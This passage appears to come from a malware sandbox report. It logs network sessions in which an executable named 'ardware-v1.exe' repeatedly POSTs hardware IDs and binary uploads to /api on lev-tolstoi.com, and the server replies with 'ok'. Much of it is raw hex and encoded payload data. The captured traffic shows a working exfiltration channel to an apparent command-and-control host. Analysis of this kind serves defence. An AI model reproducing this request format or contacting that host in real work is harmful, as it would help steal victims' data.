                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 30 4c 67 36 75 62 44 74 72 55 6a 4a 78 7a 31 59 42 65 69 6d 62 50 76 76 2b 4d 30 36 51 33 41 43 70 4d 38 58 50 65 62 4b 2b 4e 6e 74 6b 42 37 4d 6d 62 79 4e 74 4a 6d 69 43 5a 77 4a 34 4c 35 59 6c 74 65 56 31 58 74 76 51 43 75 6c 71 6a 34 49 2f 39 37 77 68 4f 6a 5a 4a 67 69 74 76 4a 6d 78 6e 54 34 35 74 44 48 4d 78 33 44 66 31 2b 44 31 51 33 4a 74 55 71 57 65 4d 77 6e 71 39 76 7a 6c 39 59 77 79 31 4b 32 41 6d 5a 43 39 30 69 6d 63 4f 66 53 71 61 4b 4c 7a 6c 65 45 58 56 30 67 44 6c 4b 38 75 43 64 71 2f 37 59 54 70 42 44 71 41 76 54 43 68 79 4c 44 71 53 4c 52 73 30 49 4a 42 6f 34 36 46 36 55 74 6a 51 43 75 46 72 6c 38 64 2f 76 4c 6f 7a 66 47 38 45 75 69 70 6a 4b 6d 4d 6a 64 6f 31 6b 42 57 59 31 6d 53 36 70 36 7a 30 5a 6b 4e 77 55 71 54 50 46 39 47 47 67 71 69
                                                                                                                                                                                                                                    Data Ascii: 0Lg6ubDtrUjJxz1YBeimbPvv+M06Q3ACpM8XPebK+NntkB7MmbyNtJmiCZwJ4L5YlteV1XtvQCulqj4I/97whOjZJgitvJmxnT45tDHMx3Df1+D1Q3JtUqWeMwnq9vzl9Ywy1K2AmZC90imcOfSqaKLzleEXV0gDlK8uCdq/7YTpBDqAvTChyLDqSLRs0IJBo46F6UtjQCuFrl8d/vLozfG8EuipjKmMjdo1kBWY1mS6p6z0ZkNwUqTPF9GGgqi
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 75 53 52 72 4a 47 77 68 64 49 74 6c 44 33 45 6f 6c 6a 71 7a 37 33 42 63 33 39 41 65 36 57 61 42 7a 6e 57 2f 73 44 4d 36 49 45 6d 78 4e 43 4e 7a 49 78 42 33 67 6d 4d 42 59 6d 65 44 5a 71 4b 68 65 6c 75 51 67 30 7a 6c 5a 59 58 4e 66 62 75 77 4d 58 74 69 42 37 45 70 61 69 4e 72 4e 33 75 4a 61 77 4e 36 4b 4a 30 73 76 75 52 35 55 4e 54 64 41 36 6b 6c 78 63 56 70 39 2b 4e 35 56 55 6b 38 39 41 31 5a 61 33 78 72 59 38 31 6b 44 6a 52 2f 33 43 53 34 37 58 56 59 31 74 49 41 34 32 4b 4f 7a 6e 71 7a 74 7a 42 2f 61 41 69 7a 4b 57 49 76 62 79 39 38 6a 6d 41 4e 65 79 69 55 61 50 57 68 65 6b 2b 51 67 30 7a 4d 66 49 37 4d 64 2f 65 6b 64 32 4d 75 44 72 70 73 4f 32 74 76 4c 48 79 4c 5a 67 35 31 49 5a 51 74 73 2b 56 38 55 64 62 59 41 2b 31 75 68 4d 31 31 75 37 55 7a 65 32 38
                                                                                                                                                                                                                                    Data Ascii: uSRrJGwhdItlD3Eoljqz73Bc39Ae6WaBznW/sDM6IEmxNCNzIxB3gmMBYmeDZqKheluQg0zlZYXNfbuwMXtiB7EpaiNrN3uJawN6KJ0svuR5UNTdA6klxcVp9+N5VUk89A1Za3xrY81kDjR/3CS47XVY1tIA42KOznqztzB/aAizKWIvby98jmANeyiUaPWhek+Qg0zMfI7Md/ekd2MuDrpsO2tvLHyLZg51IZQts+V8UdbYA+1uhM11u7Uze28
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 53 78 73 49 58 32 42 5a 51 31 79 4a 70 6b 69 74 2b 5a 34 58 4e 2f 58 54 4b 63 72 67 74 6f 78 37 2f 73 58 63 58 30 65 74 53 4a 6f 50 58 68 6c 5a 63 4e 36 51 6e 4d 72 33 48 44 37 34 6e 5a 63 31 4e 73 41 36 57 2b 49 77 6d 4f 34 76 44 35 7a 5a 52 75 38 4b 32 51 67 61 79 35 31 69 33 45 4f 65 6a 57 5a 4f 71 6d 68 4d 78 66 58 77 30 79 78 4b 37 50 46 59 61 65 34 65 30 74 34 43 71 41 6e 62 69 63 6a 4f 6a 53 55 49 77 56 34 5a 38 52 6f 76 65 35 30 56 4e 2f 61 42 65 56 6d 67 4d 74 30 74 72 30 39 63 47 51 4a 73 43 70 69 4c 6d 6b 6d 65 34 64 71 42 58 77 67 6e 7a 72 37 72 7a 31 51 79 4a 74 55 71 55 4b 43 30 48 2b 6e 2b 79 59 30 64 30 6d 78 49 43 4e 7a 49 79 46 77 67 6d 63 46 65 43 47 5a 4c 72 62 67 63 6c 62 51 31 41 6a 69 59 6f 50 44 66 4c 4b 32 50 57 68 6b 41 72 6b 67
                                                                                                                                                                                                                                    Data Ascii: SxsIX2BZQ1yJpkit+Z4XN/XTKcrgtox7/sXcX0etSJoPXhlZcN6QnMr3HD74nZc1NsA6W+IwmO4vD5zZRu8K2Qgay51i3EOejWZOqmhMxfXw0yxK7PFYae4e0t4CqAnbicjOjSUIwV4Z8Rove50VN/aBeVmgMt0tr09cGQJsCpiLmkme4dqBXwgnzr7rz1QyJtUqUKC0H+n+yY0d0mxICNzIyFwgmcFeCGZLrbgclbQ1AjiYoPDfLK2PWhkArkg
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 39 2f 68 32 34 42 65 79 53 4f 4b 62 33 7a 66 56 72 61 79 51 62 69 62 6f 6a 50 66 4c 53 39 50 33 46 69 47 37 38 73 59 43 41 6a 61 7a 71 4b 65 30 49 73 5a 37 38 2f 72 65 74 36 57 38 62 51 44 65 70 39 69 4e 49 78 2b 66 73 6f 66 58 39 4a 37 6a 70 7a 50 47 51 36 4e 4a 51 6a 42 58 68 6e 78 47 69 39 36 48 74 51 31 74 55 65 37 47 32 4b 7a 58 69 2b 76 7a 46 35 62 67 32 79 4b 32 59 6f 62 79 35 39 6a 6d 77 47 66 53 6d 56 4a 2f 75 76 50 56 44 49 6d 31 53 70 53 70 37 42 66 62 72 37 4a 6a 52 33 53 62 45 67 49 33 4d 6a 4b 58 53 49 59 77 68 79 49 35 6b 75 73 65 52 39 58 4e 50 55 43 4f 39 76 69 73 4a 36 76 72 6f 2f 66 32 51 43 73 43 46 67 4c 57 56 6c 4e 4d 31 6b 47 6a 52 2f 33 41 69 67 37 48 46 51 6b 4d 52 43 38 43 75 43 7a 6a 48 76 2b 7a 4a 32 61 67 36 32 49 57 41 6a 5a
                                                                                                                                                                                                                                    Data Ascii: 9/h24BeySOKb3zfVrayQbibojPfLS9P3FiG78sYCAjazqKe0IsZ78/ret6W8bQDep9iNIx+fsofX9J7jpzPGQ6NJQjBXhnxGi96HtQ1tUe7G2KzXi+vzF5bg2yK2Yoby59jmwGfSmVJ/uvPVDIm1SpSp7Bfbr7JjR3SbEgI3MjKXSIYwhyI5kuseR9XNPUCO9visJ6vro/f2QCsCFgLWVlNM1kGjR/3Aig7HFQkMRC8CuCzjHv+zJ2ag62IWAjZ
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC301INData Raw: 31 41 56 73 6b 6a 53 48 37 72 7a 31 51 78 70 74 55 71 56 58 46 30 48 4b 6e 75 44 5a 72 55 45 6e 75 4e 56 31 72 61 44 4e 39 6e 57 41 55 66 79 71 51 4f 59 57 68 4a 51 4f 43 69 56 36 37 4f 5a 71 43 62 6f 6a 31 65 58 73 75 55 59 38 31 49 7a 30 6a 66 53 6a 44 49 78 41 30 66 39 78 76 75 50 4e 76 55 64 50 4e 44 36 35 56 75 2b 56 6e 76 62 77 70 66 58 6b 47 39 6d 49 6a 4a 43 4e 39 51 38 31 71 42 57 38 32 69 69 57 72 35 6a 31 6f 6e 70 73 55 71 54 50 46 39 33 4b 35 74 54 35 73 66 30 53 52 4f 6d 6b 73 63 79 4a 74 67 69 4e 4d 4e 43 48 63 63 4f 69 76 50 56 50 42 6d 31 53 35 4f 64 36 58 49 75 44 72 61 32 55 67 45 50 59 36 49 33 4d 78 61 7a 71 66 49 31 6f 30 59 4a 38 36 71 65 64 2b 51 64 4f 63 4d 74 64 4d 6e 38 39 33 6f 4b 6f 48 52 47 6b 54 75 79 70 30 4f 69 38 77 65 59
                                                                                                                                                                                                                                    Data Ascii: 1AVskjSH7rz1QxptUqVXF0HKnuDZrUEnuNV1raDN9nWAUfyqQOYWhJQOCiV67OZqCboj1eXsuUY81Iz0jfSjDIxA0f9xvuPNvUdPND65Vu+VnvbwpfXkG9mIjJCN9Q81qBW82iiWr5j1onpsUqTPF93K5tT5sf0SROmkscyJtgiNMNCHccOivPVPBm1S5Od6XIuDra2UgEPY6I3MxazqfI1o0YJ86qed+QdOcMtdMn893oKoHRGkTuyp0Oi8weY
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 32 31 33 65 0d 0a 51 54 4e 47 6e 63 4c 76 75 35 4c 52 6d 51 33 78 32 70 4d 39 57 51 4b 75 4c 6f 62 69 6f 38 46 76 67 31 49 7a 30 6a 66 53 6a 44 49 78 41 30 66 39 78 76 75 50 4e 76 55 64 50 4e 44 36 35 56 75 2b 78 32 73 62 34 2b 61 69 77 6e 76 54 68 6b 61 79 31 6c 64 63 30 37 4f 7a 52 76 33 42 66 31 6f 57 55 58 69 4a 73 35 36 6d 57 4c 78 57 65 6d 39 68 64 39 61 41 79 78 50 43 45 46 61 44 46 39 7a 53 31 43 63 6d 66 45 65 50 57 68 65 55 61 51 67 31 79 37 4d 4e 43 52 4a 75 66 70 4a 6a 52 33 53 61 42 73 4f 33 6b 74 5a 57 6a 4e 4f 30 49 7a 4a 49 34 36 76 65 4a 72 56 4a 66 6c 4d 75 70 39 69 4d 31 36 74 6f 55 48 56 47 4d 49 74 53 49 68 47 6e 55 6f 61 6f 35 6d 42 55 6f 5a 6b 69 2b 76 35 6e 4e 52 30 4a 74 43 71 57 54 46 6d 6b 6a 33 38 33 6c 46 49 45 6d 75 62 44 74
                                                                                                                                                                                                                                    Data Ascii: 213eQTNGncLvu5LRmQ3x2pM9WQKuLobio8Fvg1Iz0jfSjDIxA0f9xvuPNvUdPND65Vu+x2sb4+aiwnvThkay1ldc07OzRv3Bf1oWUXiJs56mWLxWem9hd9aAyxPCEFaDF9zS1CcmfEePWheUaQg1y7MNCRJufpJjR3SaBsO3ktZWjNO0IzJI46veJrVJflMup9iM16toUHVGMItSIhGnUoao5mBUoZki+v5nNR0JtCqWTFmkj383lFIEmubDt
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 74 39 38 54 47 31 6e 69 6d 6a 6a 73 7a 4d 58 77 70 74 55 71 53 79 47 30 47 4f 78 75 43 39 35 4b 54 65 49 43 32 30 73 59 6a 4e 71 67 47 38 6a 64 7a 61 57 46 6f 58 30 66 6c 6e 65 33 42 72 34 4b 38 75 43 66 76 66 6a 41 44 6f 6d 53 59 6c 69 49 7a 4d 6a 66 54 71 34 59 41 78 36 49 49 6f 35 39 73 5a 7a 55 4e 48 4e 48 4f 52 6e 70 4d 46 67 76 66 74 33 4f 6d 68 4a 37 6e 34 74 61 32 63 30 4f 74 55 7a 55 43 39 79 7a 33 2f 72 73 32 49 5a 79 5a 73 61 71 54 50 58 6a 44 47 6c 2b 32 45 36 4b 51 71 6b 50 6d 55 6f 64 53 59 39 73 31 30 6e 59 79 53 4d 4c 72 6a 66 51 33 7a 63 33 51 76 7a 62 49 50 6b 55 66 66 31 65 58 55 75 55 59 39 73 4b 32 74 63 61 7a 71 56 49 31 6f 30 45 70 38 6d 74 65 5a 72 52 70 33 2b 47 2b 70 37 67 38 45 78 2b 66 73 2f 4f 6a 5a 5a 2b 47 78 6e 4f 69 4e 39
                                                                                                                                                                                                                                    Data Ascii: t98TG1nimjjszMXwptUqSyG0GOxuC95KTeIC20sYjNqgG8jdzaWFoX0flne3Br4K8uCfvfjADomSYliIzMjfTq4YAx6IIo59sZzUNHNHORnpMFgvft3OmhJ7n4ta2c0OtUzUC9yz3/rs2IZyZsaqTPXjDGl+2E6KQqkPmUodSY9s10nYySMLrjfQ3zc3QvzbIPkUff1eXUuUY9sK2tcazqVI1o0Ep8mteZrRp3+G+p7g8Ex+fs/OjZZ+GxnOiN9


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.549899172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=3P6WUUG987FHXT
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 12806
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC12806OUTData Raw: 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58
                                                                                                                                                                                                                                    Data Ascii: --3P6WUUG987FHXTContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--3P6WUUG987FHXTContent-Disposition: form-data; name="pid"2--3P6WUUG987FHXTContent-Disposition: form-data; name="lid"tfL8re----3P6WUUG987FHX
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:42 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=283kg4n7oaaui3hjptr1nc1jgq; expires=Sun, 13-Apr-2025 02:39:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UcaH5xi8dIe44I%2BqIncc8Jd93sMs45LNXBN9OU4wPOMom%2BymyctT%2FwfNZfEU4hiGncFenlauwBsEBap4Y0O2fPme7tsxueFBZoQUVH31pTM%2FWbIIq5lMGdfyiPtjyDoNedQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb140e3e41d3-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1736&rtt_var=662&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13741&delivery_rate=1640449&cwnd=32&unsent_bytes=0&cid=4dc635b16eebebb5&ts=739&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.549905172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:44 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=H35EOF1EQDXQI
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 15042
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:44 UTC15042OUTData Raw: 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43
                                                                                                                                                                                                                                    Data Ascii: --H35EOF1EQDXQIContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--H35EOF1EQDXQIContent-Disposition: form-data; name="pid"2--H35EOF1EQDXQIContent-Disposition: form-data; name="lid"tfL8re----H35EOF1EQDXQIC
                                                                                                                                                                                                                                    2024-12-18 08:52:46 UTC1045INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:46 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=8vio1oeneco7u09pa8kcqfafob; expires=Sun, 13-Apr-2025 02:39:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwU7IoTQBzQOL1eVhkhOEGBIKeTDKbRvoKR6EI3cT21DntJetXgT3%2F2F%2FJoxX3n02xZev%2FwBs3%2F2ceoZke7iyCgDnmY98mzq3AzJdorSiTiEt%2BD0%2BsD0GkUt030lNBhSATY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb20c8304264-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1745&rtt_var=660&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15976&delivery_rate=1650650&cwnd=220&unsent_bytes=0&cid=7ad3eb7757b8b3e7&ts=2495&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                    2024-12-18 08:52:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.549915172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:48 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=9LGACG00F8
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 20514
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:48 UTC15331OUTData Raw: 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                    Data Ascii: --9LGACG00F8Content-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--9LGACG00F8Content-Disposition: form-data; name="pid"3--9LGACG00F8Content-Disposition: form-data; name="lid"tfL8re----9LGACG00F8Content-Dispo
                                                                                                                                                                                                                                    2024-12-18 08:52:48 UTC5183OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
                                                                                                                                                                                                                                    Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                                                                                                                                    2024-12-18 08:52:49 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:49 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=qk72r0cpg3i2bkgsp7dor3aq1j; expires=Sun, 13-Apr-2025 02:39:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJCQ0Yr7SvLjNIiu0U0Wi9%2Fsyc0pbgp%2FEy3Zn6CPW1p8rXaneBX3yYUNbW95ZBJ4yvlszfvw9JNS0WFHV4TRmE7PF9CwM%2BDuUlR5IbOYL7Ea0t2PanzgZxrquOj9rIk1odQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb398e4f8c87-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2006&rtt_var=760&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21467&delivery_rate=1455633&cwnd=214&unsent_bytes=0&cid=03545d107b1f500b&ts=1756&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                    2024-12-18 08:52:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.549922172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:51 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=DPBZA0XI7BIZVZ5YU
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 1232
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:51 UTC1232OUTData Raw: 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 44 50 42 5a
